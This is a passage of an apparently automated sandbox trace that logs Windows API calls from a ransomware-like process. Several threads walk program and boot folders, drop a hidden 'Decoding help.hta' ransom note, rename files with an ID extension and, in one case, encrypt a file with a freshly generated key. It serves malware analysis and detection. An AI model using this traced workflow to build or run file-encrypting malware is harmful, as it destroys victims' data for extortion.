ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52b0 [0039.012] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.012] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.013] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.013] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.013] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0039.013] lstrcmpW (lpString1=".", lpString2="DESIGNER") returned -1 [0039.013] lstrcmpW (lpString1="..", lpString2="DESIGNER") returned -1 [0039.013] lstrcmpiW (lpString1="windows", lpString2="DESIGNER") returned 1 [0039.013] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\*.*" [0039.013] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\*.*") returned 37 [0039.013] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\", lpString2="DESIGNER" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER") returned="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER" [0039.013] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*.*" [0039.013] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3350048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.019] CloseHandle (hObject=0x1ac) returned 1 [0039.019] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0039.019] lstrcmpW (lpString1=".", lpString2="Microsoft Shared") returned -1 [0039.019] lstrcmpW (lpString1="..", lpString2="Microsoft Shared") returned -1 [0039.019] lstrcmpiW (lpString1="windows", lpString2="Microsoft Shared") returned 1 [0039.019] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\*.*" [0039.019] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\*.*") returned 37 [0039.019] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\", lpString2="Microsoft Shared" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared" [0039.019] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0039.019] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3410388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.023] CloseHandle (hObject=0x1ac) returned 1 [0039.023] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0039.023] lstrcmpW (lpString1=".", lpString2="Services") returned -1 [0039.023] lstrcmpW (lpString1="..", lpString2="Services") returned -1 [0039.023] lstrcmpiW (lpString1="windows", lpString2="Services") returned 1 [0039.023] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\*.*" [0039.023] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\*.*") returned 37 [0039.024] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\", lpString2="Services" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services") returned="\\\\?\\C:\\Program Files\\Common Files\\Services" [0039.024] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Services\\*.*" [0039.024] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3398180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.039] CloseHandle (hObject=0x1ac) returned 1 [0039.039] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0039.039] lstrcmpW (lpString1=".", lpString2="SpeechEngines") returned -1 [0039.039] lstrcmpW (lpString1="..", lpString2="SpeechEngines") returned -1 [0039.039] lstrcmpiW (lpString1="windows", lpString2="SpeechEngines") returned 1 [0039.041] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\*.*" [0039.041] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\*.*") returned 37 [0039.041] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\", lpString2="SpeechEngines" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines" [0039.041] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*.*" [0039.041] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9430528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.049] CloseHandle (hObject=0x1ac) returned 1 [0039.049] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0039.049] lstrcmpW (lpString1=".", lpString2="System") returned -1 [0039.049] lstrcmpW (lpString1="..", lpString2="System") returned -1 [0039.049] lstrcmpiW (lpString1="windows", lpString2="System") returned 1 [0039.049] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\*.*" [0039.049] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\*.*") returned 37 [0039.049] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\", lpString2="System" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System") returned="\\\\?\\C:\\Program Files\\Common Files\\System" [0039.049] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" [0039.050] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x34283f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.058] CloseHandle (hObject=0x1ac) returned 1 [0039.058] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0039.058] FindClose (in: hFindFile=0x5a52b0 | out: hFindFile=0x5a52b0) returned 1 Thread: id = 29 os_tid = 0xaa8 [0039.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*.*", lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.016] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.016] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.016] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.016] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.016] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.016] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\de-DE\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\de-DE\\*.*") returned="\\\\?\\C:\\Boot\\de-DE\\*.*" [0039.016] lstrlenW (lpString="\\\\?\\C:\\Boot\\de-DE\\*.*") returned 21 [0039.016] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\de-DE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\de-DE\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\de-DE\\Decoding help.hta" [0039.016] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\Decoding help.hta" (normalized: "c:\\boot\\de-de\\decoding help.hta")) returned 0xffffffff [0039.016] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\Decoding help.hta" (normalized: "c:\\boot\\de-de\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0039.016] WriteFile (in: hFile=0x188, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x36cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x36cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.017] CloseHandle (hObject=0x188) returned 1 [0039.017] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.017] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.018] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.018] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\de-DE\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\de-DE\\*.*") returned="\\\\?\\C:\\Boot\\de-DE\\*.*" [0039.018] lstrlenW (lpString="\\\\?\\C:\\Boot\\de-DE\\*.*") returned 21 [0039.018] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\de-DE\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" [0039.018] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" [0039.018] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.018] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.018] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.018] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 30 os_tid = 0xaac [0039.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*", lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.021] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.021] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.021] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.021] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.021] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e07710, ftCreationTime.dwHighDateTime=0x1d4cb90, ftLastAccessTime.dwLowDateTime=0xb0187ee0, ftLastAccessTime.dwHighDateTime=0x1d4fce6, ftLastWriteTime.dwLowDateTime=0xb0187ee0, ftLastWriteTime.dwHighDateTime=0x1d4fce6, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="determine matthew.exe", cAlternateFileName="DETERM~1.EXE")) returned 1 [0039.021] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*" [0039.021] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*") returned 36 [0039.021] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Decoding help.hta" [0039.021] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\decoding help.hta")) returned 0xffffffff [0039.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0039.021] WriteFile (in: hFile=0x188, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x40cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x40cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.022] CloseHandle (hObject=0x188) returned 1 [0039.022] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.022] lstrcmpiW (lpString1="Decoding help.hta", lpString2="determine matthew.exe") returned -1 [0039.022] lstrlenW (lpString="determine matthew.exe") returned 21 [0039.022] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*" [0039.022] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*") returned 36 [0039.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\", lpString2="determine matthew.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\determine matthew.exe") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\determine matthew.exe" [0039.023] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\determine matthew.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\determine matthew.exe") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\determine matthew.exe" [0039.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\determine matthew.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\determine matthew.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\determine matthew.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.023] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\determine matthew.exe" (normalized: "c:\\program files (x86)\\adobe\\determine matthew.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\determine matthew.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\determine matthew.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.029] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\determine matthew.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\determine matthew.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0039.029] CreateFileMappingA (hFile=0x188, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1e0 [0039.029] CryptAcquireContextA (in: phProv=0x40cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x40cfcec*=0x5a7c68) returned 1 [0039.030] CryptGenKey (in: hProv=0x5a7c68, Algid=0x6610, dwFlags=0x1, phKey=0x40cfce8 | out: phKey=0x40cfce8*=0x5a5330) returned 1 [0039.030] CryptExportKey (in: hKey=0x5a5330, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x40cfbe4, pdwDataLen=0x40cfce4 | out: pbData=0x40cfbe4*, pdwDataLen=0x40cfce4*=0x2c) returned 1 [0039.030] MapViewOfFile (hFileMappingObject=0x1e0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x510000 [0039.033] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x40cfbe4*, pdwDataLen=0x40cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x40cfbe4*, pdwDataLen=0x40cfcf8*=0x100) returned 1 [0039.033] CryptEncrypt (in: hKey=0x5a5330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x510000, pdwDataLen=0x40cfce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x510000*, pdwDataLen=0x40cfce4*=0x12800) returned 1 [0039.034] UnmapViewOfFile (lpBaseAddress=0x510000) returned 1 [0039.035] CloseHandle (hObject=0x1e0) returned 1 [0039.035] CryptDestroyKey (hKey=0x5a5330) returned 1 [0039.036] CryptReleaseContext (hProv=0x5a7c68, dwFlags=0x0) returned 1 [0039.036] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.036] WriteFile (in: hFile=0x188, lpBuffer=0x40cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x40cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x40cfbe4*, lpNumberOfBytesWritten=0x40cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.036] WriteFile (in: hFile=0x188, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x40cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x40cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.037] CloseHandle (hObject=0x188) returned 1 [0039.038] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\determine matthew.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader 10.0", cAlternateFileName="READER~1.0")) returned 1 [0039.038] lstrcmpW (lpString1=".", lpString2="Reader 10.0") returned -1 [0039.038] lstrcmpW (lpString1="..", lpString2="Reader 10.0") returned -1 [0039.038] lstrcmpiW (lpString1="windows", lpString2="Reader 10.0") returned 1 [0039.039] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*" [0039.039] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\*.*") returned 36 [0039.039] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\", lpString2="Reader 10.0" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0" [0039.039] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0039.039] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x633ef8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x188 [0039.048] CloseHandle (hObject=0x188) returned 1 [0039.048] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, 